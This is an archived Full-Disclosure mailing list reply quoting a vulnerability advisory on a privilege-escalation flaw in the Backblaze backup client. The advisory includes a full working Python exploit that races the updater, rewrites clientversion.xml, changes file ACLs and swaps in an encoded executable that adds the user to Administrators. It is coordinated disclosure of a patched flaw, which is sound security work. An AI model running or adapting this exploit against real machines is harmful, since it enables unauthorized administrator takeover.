lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Thu, 24 Dec 2020 12:28:06 -0600
From: Jason Geffner <geffner@...il.com>
To: Reed Loden <reed@...dloden.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD]
	CVE-2020-8152 – Elevation of Privilege in Backblaze

Thanks, Reed. I've updated the GitHub repository name to reflect this
change. The detailed write-up can now be found at
https://github.com/geffner/CVE-2020-8290/blob/master/README.md.

On Tue, Dec 22, 2020 at 3:52 AM Reed Loden <reed@...dloden.com> wrote:

> Due to a process fail, this CVE ID was accidentally reused for another
> vulnerability.
>
> The updated CVE ID for this issue is CVE-2020-8290.
>
> We apologize to Jason and others for the inconvenience caused by this
> error.
>
> Happy holidays,
> ~reed
> (for HackerOne)
>
> On Fri, Sep 11, 2020 at 10:16 AM Jason Geffner <geffner@...il.com> wrote:
>
>> CVE-2020-8152 – Elevation of Privilege in Backblaze
>> ---------------------------------------------------
>>
>> Summary
>> =======
>> Name: Elevation of Privilege in Backblaze
>> CVE: CVE-2020-8152
>> Discoverer: Jason Geffner
>> Vendor: Backblaze
>> Product: Backblaze for Windows and Backblaze for macOS
>> Risk: High
>> Discovery Date: 2020-03-13
>> Publication Data: 2020-09-08
>> Fixed Version: 7.0.0.439
>>
>> Introduction
>> ============
>> Per Wikipedia, Backblaze is "an online backup tool that allows Windows
>> and macOS
>> users to back up their data to offsite data centers. The service is
>> designed for
>> businesses and end-users, providing unlimited storage space and supporting
>> unlimited file sizes."
>>
>> Vulnerable versions of Backblaze for Windows and Backblaze for macOS
>> contain a
>> high risk vulnerability that allows a local unprivileged attacker to
>> perform an
>> elevation of privilege (EOP) attack to become SYSTEM/root.
>>
>> Vulnerability
>> =============
>> The Backblaze client's service process, named bzserv, runs as SYSTEM on
>> Windows
>> and as root on macOS. Every couple of hours, bzserv runs a program named
>> bztransmit (executed as SYSTEM/root) to download an XML file named
>> clientversion.xml from Backblaze's data center to see if a newer version
>> of the
>> Backblaze client is available for download, and if so, downloads the
>> latest
>> client version's installer from Backblaze's data center. The downloaded
>> installer is saved to the %ProgramData%\Backblaze\bzdata\bzupdates
>> directory in
>> Windows and to the /Library/Backblaze.bzpkg/bzdata/bzupdates or
>> /Library/Backblaze/bzdata/bzupdates directory on macOS. Once downloaded,
>> bztransmit runs the downloaded installer as SYSTEM via ShellExecute() or
>> as root
>> via system().
>>
>> On Windows, the %ProgramData%\Backblaze\bzdata directory is created at
>> install-time such that local unprivileged users have read- and
>> write-access. The
>> bztransmit process creates the bzupdates child directory while it's
>> running as
>> SYSTEM, and unprivileged users do not have read- or write-access to this
>> child
>> directory once it's created. However, the bztransmit process does not
>> securely
>> verify the ACL on this bzupdates directory if it already existed, nor
>> does it
>> securely update the ACL if the directory already existed. As such, a local
>> unprivileged attacker can create the
>> %ProgramData%\Backblaze\bzdata\bzupdates
>> directory prior to Backblaze's installation, or create the bzupdates child
>> directory under %ProgramData%\Backblaze\bzdata after Backblaze is
>> installed and
>> before bztransmit creates the bzupdates child directory. This allows the
>> attacker to be the owner of the bzupdates directory and have full control
>> over
>> the files in that directory. Thus, the attacker can modify or replace the
>> downloaded update executable after it's downloaded and before it's
>> executed,
>> thereby allowing for local EOP.
>>
>> On macOS, the /Library/Backblaze.bzpkg/bzdata directory (or
>> /Library/Backblaze/bzdata) is created at install-time with permissions
>> 0777
>> (drwxrwxrwx), such that local unprivileged users have read- and
>> write-access.
>> The bztransmit process creates the bzupdates child directory with
>> permissions
>> 0755 (drwxr-xr-x) while it's running as root, and unprivileged users do
>> not have
>> read- or write-access to this child directory once it's created. However,
>> the
>> bztransmit process does not securely verify the permissions on this
>> bzupdates
>> directory if it already existed, nor does it securely update the
>> permissions if
>> the directory already existed. As such, a local unprivileged attacker can
>> create
>> the bzupdates child directory under /Library/Backblaze.bzpkg/bzdata (or
>> /Library/Backblaze/bzdata) after Backblaze is installed and before
>> bztransmit
>> creates the bzupdates child directory. This allows the attacker to be the
>> owner
>> of the bzupdates directory and have full control over the files in that
>> directory. Thus, the attacker can modify or replace the downloaded update
>> executable after it's downloaded and before it's executed, thereby
>> allowing for
>> local EOP.
>>
>> Proof of Concept
>> ================
>> Video: https://youtu.be/OpC6neWd2aM
>>
>> The above video shows two concurrent logins to the same VM: an
>> administrator's
>> session on the left, and an unprivileged attacker's session on the right.
>> You
>> can see the following steps in the in the video:
>>
>> 1. Attacker runs "net localgroup Administrators" to show that the
>> unprivileged
>>    attacker's account (named Attacker) is not a member of the
>> Administrators
>>    group.
>> 2. Attacker runs "python eop.py" (whose source code is below).
>> 3. The administrator then installs Backblaze.
>> 4. Six minutes later, the installed Backblaze service downloads
>>    clientversion.xml, which the exploit overwrites.
>> 5. One minute later, the installed Backblaze service downloads the updater
>>    executable, which the exploit overwrites.
>> 6. The Backblaze service then runs the overwritten updater, which adds the
>>    Attacker account to the Administrators group.
>> 7. The attacker then runs "net localgroup Administrators" again to show
>> that the
>>    Attacker account has indeed been added to the Administrators group.
>> Local
>>    privilege elevation complete.
>>
>> ________________________________________________________________________________
>> # Licensed under the Apache License, Version 2.0 (the "License");
>> # you may not use this file except in compliance with the License.
>> # You may obtain a copy of the License at
>> #
>> #     http://www.apache.org/licenses/LICENSE-2.0
>> #
>> # Unless required by applicable law or agreed to in writing, software
>> # distributed under the License is distributed on an "AS IS" BASIS,
>> # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
>> # See the License for the specific language governing permissions and
>> # limitations under the License.
>>
>> """Proof-of-concept exploit for CVE-2020-8152 for Windows."""
>>
>>
>> __author__ = "geffner@...il.com (Jason Geffner)"
>> __version__ = "1.0"
>>
>>
>> import base64
>> import bz2
>> import ctypes
>> import os
>> import platform
>> import re
>> import subprocess
>> import time
>>
>>
>> def wait_for_filesystem_object(file_path):
>>     if os.path.exists(file_path):
>>         return
>>     parent_directory = os.path.dirname(file_path)
>>     if not os.path.exists(parent_directory):
>>         wait_for_filesystem_object(parent_directory)
>>     buffer = ctypes.create_string_buffer(1024)
>>     bytes_returned = ctypes.c_ulong()
>>     if "." in os.path.basename(file_path):
>>         notify_filter = 8
>>     else:
>>         notify_filter = 2
>>     h = ctypes.windll.kernel32.CreateFileW(parent_directory, 1, 3, None,
>> 3,
>>                                            0x02000000, None)
>>     while not os.path.exists(file_path):
>>         ctypes.windll.kernel32.ReadDirectoryChangesW(
>>             h, ctypes.byref(buffer), 1024, False, notify_filter,
>>             ctypes.byref(bytes_returned), None, None)
>>     ctypes.windll.kernel32.CloseHandle(h)
>>
>>
>> def get_exe_content():
>>     #
>>     # Returns the content of an EXE that will add the attacker to the
>>     # Administrators group. Based on
>>     # https://github.com/corkami/pocs/blob/master/PE/tiny.asm
>>     #
>>     exe_content = bz2.decompress(base64.b85decode(
>>
>> "LRx4!F+o`-Q&~Gdx1Rt2IDf_b?h*hH0T=+r20)M=eGothKnwr?AOHZM0CF*qXfk9P8W?" +
>>
>> "~Xpp?}o=_Zd;AT%0gp!EiU7eYM!=ig9Ls6k|2Zp2X7u2P_M#mS9GBAA+UVO{FjHAvEri" +
>>         "p0bod_MlBT`kDlS6O$(^CD~4Z=KV8QJRn3`8m~{QUE*R2n)F)oG3^gpWDxX"))
>>     exe_content += ("NET LOCALGROUP Administrators " +
>>                     f"{os.environ['USERDOMAIN']}\\" +
>>                     f"{os.environ['USERNAME']} /ADD").encode()
>>     return exe_content
>>
>>
>> def am_i_admin():
>>     bufptr = ctypes.c_void_p()
>>     ctypes.windll.netapi32.NetUserGetInfo(
>>         os.environ["USERDOMAIN"], os.environ["USERNAME"], 1,
>>         ctypes.byref(bufptr))
>>     if platform.architecture()[0] == "32bit":
>>         usri1_priv = ctypes.string_at(bufptr, 13)[-1]
>>     else:
>>         usri1_priv = ctypes.string_at(bufptr, 21)[-1]
>>     ctypes.windll.netapi32.NetApiBufferFree(bufptr)
>>     return usri1_priv == 2
>>
>>
>> def poc():
>>     print(f"Running as user: {os.environ['USERNAME']}")
>>
>>     # Ensure that we're running as an unprivileged user.
>>     print("Testing for administrative privileges...")
>>     if am_i_admin():
>>         print("You're already an administrator. Bye!")
>>         return
>>     print("You're a non-administrative user.")
>>
>>     # Raise our process's priority to try to win our race condition.
>>     pid = ctypes.windll.kernel32.GetCurrentProcessId()
>>     h = ctypes.windll.kernel32.OpenProcess(0x200, False, pid)
>>     ctypes.windll.kernel32.SetPriorityClass(h, 0x100)
>>     ctypes.windll.kernel32.CloseHandle(h)
>>
>>     # Create the bzupdates directory so that we are the owner of it.
>>     bzupdates =
>> f"{os.environ['ProgramData']}\\Backblaze\\bzdata\\bzupdates"
>>     if os.path.exists(bzupdates):
>>         print("Backblaze's bzupdates directory was already created.
>> You're " +
>>               "too late!")
>>         return
>>     os.makedirs(bzupdates)
>>
>>     #
>>     # Get the installed hguid value so that we can force an update via
>>     # clientversion.xml.
>>     #
>>     if platform.architecture()[0] == "32bit":
>>         bzinstall =
>> f"{os.environ['ProgramFiles']}\\Backblaze\\bzinstall.xml"
>>     else:
>>         bzinstall = f"{os.environ['ProgramFiles(x86)']}" +\
>>                     "\\Backblaze\\bzinstall.xml"
>>     if not os.path.exists(bzinstall):
>>         print("Waiting for Backblaze's installer to assign an hguid
>> value.")
>>         wait_for_filesystem_object(bzinstall)
>>         print("Backblaze assigned an hguid value.")
>>     with open(bzinstall) as f:
>>         xml = f.read()
>>     hguid = re.search('hguid="([^"]+)"', xml).group(1)
>>
>>     # Force update via clientversion.xml.
>>     if not os.path.exists(f"{bzupdates}\\clientversion.xml"):
>>         print("Waiting for Backblaze to download clientversion.xml.")
>>         wait_for_filesystem_object(f"{bzupdates}\\clientversion.xml")
>>         print("clientversion.xml now downloaded.")
>>     with open(f"{bzupdates}\\clientversion.xml", "r+") as f:
>>         xml = f.read()
>>         xml = re.sub('update_hguids_firstchar=".',
>>                      f'update_hguids_firstchar="{hguid[0]}', xml)
>>         xml = xml.replace('win32_version="', 'win32_version="1')
>>         f.truncate(0)
>>         f.seek(0)
>>         f.write(xml)
>>     print("clientversion.xml modified to force update next time Backblaze
>> " +
>>           "considers updating.")
>>
>>     # Don't allow SYSTEM to overwrite clientversion.xml.
>>     subprocess.run(["icacls.exe", f"{bzupdates}\\clientversion.xml",
>>                     "/setowner", f"{os.environ['USERNAME']}"])
>>     print()
>>     subprocess.run(f'echo y| cacls.exe "{bzupdates}\\clientversion.xml" '
>> +
>>                    '/S:D:PAI(A;;FA;;;OW)(A;;GRGX;;;SY)', shell=True)
>>     print()
>>
>>     #
>>     # Create an executable to replace the downloaded update, which will
>> elevate
>>     # our privileges.
>>     #
>>     exe_content = get_exe_content()
>>     with open(f"{bzupdates}\\eop.exe", "wb") as f:
>>         f.write(exe_content)
>>
>>     #
>>     # Wait for update to download and overwrite it with attacker's
>> executable.
>>     # In this PoC we use iexpress.exe (built into Windows) to create an
>> EXE that
>>     # adds the attacker to the Administrators group, but an attacker could
>>     # supply any executable content they like.
>>     #
>>     exe = re.search('win32_url=.+?file=([^"]+)"', xml).group(1)
>>     print(f"Waiting for Backblaze to download {exe}.")
>>     wait_for_filesystem_object(f"{bzupdates}\\{exe}")
>>     os.replace(f"{bzupdates}\\eop.exe", f"{bzupdates}\\{exe}")
>>     print(f"{exe} downloaded and replaced.")
>>     print(f"{exe} should now get executed as SYSTEM.")
>>
>>     for i in range(5):
>>         if am_i_admin():
>>             print("Success! You're now an administrator!")
>>             return
>>         time.sleep(1)
>>     print("Exploit failed. We probably lost the race-condition when " +
>>           f"overwriting {exe}.")
>>
>>
>> if __name__ == "__main__":
>>     poc()
>>
>> ________________________________________________________________________________
>>
>> Mitigation
>> ==========
>> Backblaze patched this vulnerability in Backblaze version 7.0.0.439.
>>
>> Discoverer
>> ==========
>> This vulnerability was discovered and reported to Backblaze by Jason
>> Geffner via
>> HackerOne.
>>
>> Timeline
>> ========
>> 2020-03-13 - Vulnerability discovered and reported to Backblaze via
>> HackerOne
>> 2020-03-26 - HackerOne verified vulnerability
>> 2020-04-22 - CVE-2020-8152 assigned
>> 2020-04-22 - Build 7.0.0.439 released
>> 2020-04-22 - Vulnerability mitigation verified
>> 2020-04-23 - Public disclosure requested
>> 2020-09-08 - Public disclosure
>>
>> _______________________________________________
>> Sent through the Full Disclosure mailing list
>> https://nmap.org/mailman/listinfo/fulldisclosure
>> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists